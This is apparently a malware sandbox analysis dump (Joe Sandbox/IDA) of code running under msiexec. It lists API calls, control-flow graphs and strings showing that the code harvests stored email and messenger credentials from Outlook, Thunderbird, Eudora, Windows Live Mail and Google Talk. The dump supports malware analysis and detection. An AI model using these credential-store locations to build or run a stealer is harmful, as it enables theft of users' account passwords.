34034 426741 87 API calls 33851 4401a6 21 API calls 33853 426da6 memcpy memset memset memcpy 33854 4335a5 15 API calls 33856 4299ab memset memset memcpy memset memset 33857 40b1ab 8 API calls 34039 425115 76 API calls __fprintf_l 34043 4113b2 18 API calls 2 library calls 34047 40a3b8 memset sprintf SendMessageA 32892 410bbc 32895 4109cf 32892->32895 32896 4109dc 32895->32896 32897 410a23 memset GetPrivateProfileStringA 32896->32897 32898 4109ea memset 32896->32898 32903 407646 strlen 32897->32903 32908 4075cd sprintf memcpy 32898->32908 32901 410a0c WritePrivateProfileStringA 32902 410a65 32901->32902 32904 40765a 32903->32904 32906 40765c 32903->32906 32904->32902 32905 4076a3 32905->32902 32906->32905 32909 40737c strtoul 32906->32909 32908->32901 32909->32906 33859 40b5bf memset memset _mbsicmp

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040832F
                                                                                              • memset.MSVCRT ref: 00408343
                                                                                              • memset.MSVCRT ref: 0040835F
                                                                                              • memset.MSVCRT ref: 00408376
                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                              • strlen.MSVCRT ref: 004083E9
                                                                                              • strlen.MSVCRT ref: 004083F8
                                                                                              • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                              • String ID: 5$H$O$b$i$}$}
                                                                                              • API String ID: 1832431107-3760989150
                                                                                              • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                              • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                              • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                              • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 345 407f86-407f88 343->345 344->345 345->342
                                                                                              APIs
                                                                                              • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                              • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                              • strlen.MSVCRT ref: 00407F5C
                                                                                              • strlen.MSVCRT ref: 00407F64
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindstrlen$FirstNext
                                                                                              • String ID: ACD
                                                                                              • API String ID: 379999529-620537770
                                                                                              • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                              • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                              • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                              • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00401E8B
                                                                                              • strlen.MSVCRT ref: 00401EA4
                                                                                              • strlen.MSVCRT ref: 00401EB2
                                                                                              • strlen.MSVCRT ref: 00401EF8
                                                                                              • strlen.MSVCRT ref: 00401F06
                                                                                              • memset.MSVCRT ref: 00401FB1
                                                                                              • atoi.MSVCRT(?), ref: 00401FE0
                                                                                              • memset.MSVCRT ref: 00402003
                                                                                              • sprintf.MSVCRT ref: 00402030
                                                                                              • memset.MSVCRT ref: 00402086
                                                                                              • memset.MSVCRT ref: 0040209B
                                                                                              • strlen.MSVCRT ref: 004020A1
                                                                                              • strlen.MSVCRT ref: 004020AF
                                                                                              • strlen.MSVCRT ref: 004020E2
                                                                                              • strlen.MSVCRT ref: 004020F0
                                                                                              • memset.MSVCRT ref: 00402018
                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                              • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                              • API String ID: 3833278029-4223776976
                                                                                              • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                              • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                              • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                              • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                              • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                              • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                              • API String ID: 745651260-375988210
                                                                                              • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                              • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                              • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                              • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                              • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                              • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                              Strings
                                                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                              • pstorec.dll, xrefs: 00403C30
                                                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                              • PStoreCreateInstance, xrefs: 00403C44
                                                                                              • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                              • API String ID: 1197458902-317895162
                                                                                              • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                              • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                              • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                              • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 238 444c80-444c85 236->238 239 444c9f-444ca3 236->239 246 444d02-444d0d __setusermatherr 237->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->247 238->234 241 444c8c-444c93 238->241 239->234 242 444ca5-444ca7 239->242 241->234 244 444c95-444c9d 241->244 245 444cad-444cb0 242->245 244->245 245->237 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 254 444d81-444d85 250->254 255 444da9-444dad 250->255 252 444d74-444d76 251->252 253 444d78-444d7b 251->253 252->251 252->253 253->254 256 444d7d-444d7e 253->256 257 444d87-444d89 254->257 258 444d8b-444d9c GetStartupInfoA 254->258 255->250 256->254 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                              • String ID:
                                                                                              • API String ID: 3662548030-0
                                                                                              • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                              • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                              • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                              • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0044430B
                                                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                              • memset.MSVCRT ref: 00444379
                                                                                              • memset.MSVCRT ref: 00444394
                                                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                              • strlen.MSVCRT ref: 004443DB
                                                                                              • _strcmpi.MSVCRT ref: 00444401
                                                                                              Strings
                                                                                              • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                              • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                              • Store Root, xrefs: 004443A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                              • API String ID: 3203569119-2578778931
                                                                                              • Opcode ID: a5a3b5de69c01cde89edf01c6ca21efea8d82838e5b9820ad63090ec74a4c9c8
                                                                                              • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                              • Opcode Fuzzy Hash: a5a3b5de69c01cde89edf01c6ca21efea8d82838e5b9820ad63090ec74a4c9c8
                                                                                              • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                              • String ID:
                                                                                              • API String ID: 2054149589-0
                                                                                              • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                              • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                              • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                              • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 321 40ba74 314->321 322 40ba6f-40ba72 314->322 315->308 315->309 316 40baa0-40bab3 call 407e30 324 40bab5-40bac1 316->324 325 40bafa-40bb09 SetCursor 316->325 323 40ba75-40ba76 call 40b5e5 321->323 322->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->316 332->316 333->316 334->316
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor_mbsicmpqsort
                                                                                              • String ID: /nosort$/sort
                                                                                              • API String ID: 882979914-1578091866
                                                                                              • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                              • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                              • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                              • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004109F7
                                                                                                • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                              • memset.MSVCRT ref: 00410A32
                                                                                              • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3143880245-0
                                                                                              • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                              • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                              • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                              • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                              • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                              • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                              • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 379 410ddf-410de2 370->379 380 410dee-410df1 370->380 373 410e27-410e35 371->373 374 410e1d-410e20 371->374 375 410e45-410e4f call 410a9c 373->375 374->373 377 410e22-410e25 374->377 384 410e51-410e76 call 410d3d call 410add 375->384 385 410e7f-410e92 _mbscpy 375->385 377->373 381 410e37-410e40 377->381 379->371 383 410de4-410de7 379->383 387 410df8 380->387 381->375 383->371 386 410de9-410dec 383->386 384->385 389 410e95-410e97 385->389 386->371 386->380 387->389
                                                                                              APIs
                                                                                                • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                              • memset.MSVCRT ref: 00410E10
                                                                                              • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                              • API String ID: 119022999-2036018995
                                                                                              • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                              • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                              • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                              • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                                                              APIs
                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                              • memset.MSVCRT ref: 00408620
                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                              • memset.MSVCRT ref: 00408671
                                                                                              Strings
                                                                                              • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                                              • String ID: Software\Google\Google Talk\Accounts
                                                                                              • API String ID: 3996936265-1079885057
                                                                                              • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                              • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                              • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                              • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 416 40ce70-40cea1 call 4023b2 call 401e69 421 40cea3-40cea6 416->421 422 40ceb8 416->422 423 40ceb2 421->423 424 40cea8-40ceb0 421->424 425 40cebd-40cecc _strcmpi 422->425 426 40ceb4-40ceb6 423->426 424->426 427 40ced3-40cedc call 40cdda 425->427 428 40cece-40ced1 425->428 426->425 429 40cede-40cef7 call 40c3d0 call 40ba28 427->429 433 40cf3f-40cf43 427->433 428->429 437 40cef9-40cefd 429->437 438 40cf0e 429->438 439 40cf0a-40cf0c 437->439 440 40ceff-40cf08 437->440 441 40cf13-40cf30 call 40affa 438->441 439->441 440->441 443 40cf35-40cf3a call 40c580 441->443 443->433
                                                                                              APIs
                                                                                                • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                              • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: strlen$_strcmpimemset
                                                                                              • String ID: /stext
                                                                                              • API String ID: 520177685-3817206916
                                                                                              • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
